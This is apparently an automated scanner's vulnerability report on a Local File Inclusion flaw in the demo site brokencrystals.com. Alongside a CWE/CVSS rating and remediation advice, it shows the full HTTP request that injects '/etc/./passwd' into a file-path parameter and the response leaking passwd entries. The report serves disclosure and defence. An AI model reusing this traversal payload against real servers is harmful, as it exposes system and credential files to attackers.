Local File Inclusion
Severity: High
Discovered: 10 October 2022, 11:12 PM
CWE ID
CWE-22
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
Local File Inclusion (also known as LFI) is the process of including files that are already located on the server by exploiting vulnerable inclusion procedures implemented in the application.
LFI occurred while injecting token "/etc/./passwd" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/filepath=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg
Detected system is: Linux
Possible exposure
Data leakage, Access to unauthorized information
Remediation suggestions
The most effective way to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem or framework API. If this is not possible, the application can maintain a whitelist of files that may be included by the page and use an identifier (for example, an index number) to select the file. Any request containing an invalid identifier must be rejected; this leaves no attack surface for a malicious user to manipulate the path.
Request
GET https://brokencrystals.com/api/file?path=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443548473; connect.sid=sHyC6Ic9qPYT5MQmsUZnv3nOZL1OQaY6.l7wv3qq%2BYzKke0kaiNh473SOFW%2BDgJOpYs9CB%2BmEywo
Accept-Encoding: identity
Response
HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:28 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443548511
Content-Length: 100
Cache-Control: public, max-age=99999
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/
External links